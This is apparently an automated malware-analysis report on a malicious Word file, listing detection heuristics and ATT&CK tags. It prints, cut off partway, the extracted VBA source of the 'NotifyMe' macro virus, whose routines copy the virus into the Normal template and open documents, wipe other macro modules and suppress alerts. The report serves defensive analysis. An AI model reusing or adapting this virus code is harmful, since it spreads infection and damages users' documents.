MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file contains critical heuristics indicating it is a malicious Word document with obfuscated VBA macros, specifically an auto-exec loader. The presence of AutoOpen and Auto_Close macros, along with legacy WordBasic markers, strongly suggests malware. The ClamAV detection 'Doc.Trojan.Notme-1' further confirms its malicious nature. The VBA script itself is identified as the 'NotifyMe WordMacro Virus Project', indicating its intent to spread and infect.
Heuristics 6
-
ClamAV: Doc.Trojan.Notme-1 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Notme-1
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10553 bytes |
SHA-256: a51b0b72cb22c4ce760333a924525d54d70caf607158eec8491408da2bcc3249 |
|||
|
Detection
ClamAV:
Doc.Trojan.Notme-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NotifyMe2"
'***************************************************************
' NotifyMe WordMacro Virus Project
' Version 2.10.02
' Created by Tohenk (c) Tohenk Software, 2000
' Date 02 February 2000
' Revised 15, 16, 24, 29 February 2000
' Activated 29 February 2000
' Dedicated to -All My Generation in this occupation
' -We all have the same destiny
' -Also specially to my family and my lover
'***************************************************************
' Global variables
Public N2_TIMED As Boolean
Public N2_CONF As Boolean
Public N2_GCONF As Boolean
Public N2_TCOUNT As Integer
' Internal variables
Private N2_ASAV
Private N2_DOCSAV As Boolean
Private Const N2_ID = "NotifyMe2"
Private Const N2_FSRC = ".n2s"
Private Const N2_FTEMP = ".dot"
' Private procedure for internal handling
Private Function N2_Infected(Src) As Boolean
N2_Infected = False
For Each Item In Src.VBProject.VBComponents
If Item.Name = N2_ID Then
If Item.CodeModule.CountOfLines <> 0 Then
N2_Infected = True
Else
Application.OrganizerDelete Src.FullName, Item.Name, wdOrganizerObjectProjectItems
End If
End If
Next Item
End Function
Private Sub N2_Copy(Src, Dest, Name)
For Each Item In Name
Application.OrganizerCopy Src, Dest.FullName, Item, wdOrganizerObjectProjectItems
Next Item
If Dest <> NormalTemplate Then
With Dest.VBProject
.Name = "NotifyMe"
.Description = "NotifyMe 2 WordMacro Virus Project"
End With
End If
End Sub
Private Sub N2_Del(Src)
For Each Item In Src.VBProject.VBComponents
If Item.Name <> N2_ID And _
Item.Name <> "ThisDocument" And _
Item.Name <> "Reference to Normal" Then
If Item.Type = vbext_ct_StdModule Then Item.CodeModule.DeleteLines 1, Item.CodeModule.CountOfLines
End If
Next Item
End Sub
Private Sub N2_CopyTo(Src, Dest)
On Error Resume Next
Dim MacroList(0)
MacroList(0) = N2_ID
N2_DOCSAV = False
Call N2_Del(Dest)
If Not N2_Infected(Dest) Then
Call N2_Copy(Src, Dest, MacroList)
N2_DOCSAV = True
End If
End Sub
Private Sub N2_StampIt()
With Dialogs(wdDialogFileSummaryInfo)
.Author = "Tohenk"
.Title = "NotifyMe 2 WordMacro Virus"
.Subject = "Just NOTIFY-ME to what I've done"
.Comments = _
"This was created and dedicated for: MY LITTLE SWEAT-GIRL " & _
Chr(34) & Chr(78) & Chr(85) & Chr(78) & Chr(85) & Chr(75) & _
Chr(34) & Chr(44) & Chr(32) & Chr(84) & Chr(65) & Chr(67) & _
Chr(73) & Chr(75) & Chr(44) & Chr(32) & Chr(85) & Chr(76) & _
Chr(70) & Chr(65) & Chr(44) & Chr(32) & Chr(78) & Chr(71) & _
Chr(65) & Chr(78) & Chr(84) & Chr(72) & Chr(82) & Chr(85) & Chr(69) & ", aND SO on"
.Execute
End With
End Sub
Private Sub N2_D2T()
N2_ASAV = Application.DisplayAlerts
Application.DisplayAlerts = wdAlertsNone
For Each Temp In Templates
Call N2_CopyTo(ActiveDocument.FullName, Temp)
If N2_DOCSAV Then Temp.Save
Next Temp
Application.DisplayAlerts = N2_ASAV
End Sub
Private Sub N2_T2D()
N2_ASAV = Application.DisplayAlerts
Application.DisplayAlerts = wdAlertsNone
For Each Doc In Documents
Call N2_CopyTo(NormalTemplate.FullName, Doc)
Call N2_StampIt
Next Doc
Application.DisplayAlerts = N2_ASAV
End Sub
Private Sub N2_Master()
Call N2_D2T
Call N2_T2D
End Sub
Private Sub N2_ECopy()
On Error Resume Next
Src = Options.DefaultFilePath(wdStartupPath) & "\" & N2_ID & N2_FSRC
Call N2_CopyTo(Src, NormalTemplate)
Call N2_Master
ActiveDocument.Saved = True
End Sub
Private Sub N2_RSF()
SLoc = Options.DefaultFilePath(wdStartupPath)
Sfile = Dir(SLoc & "\*" & N2_FTEMP)
Do While Sfile <> ""
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.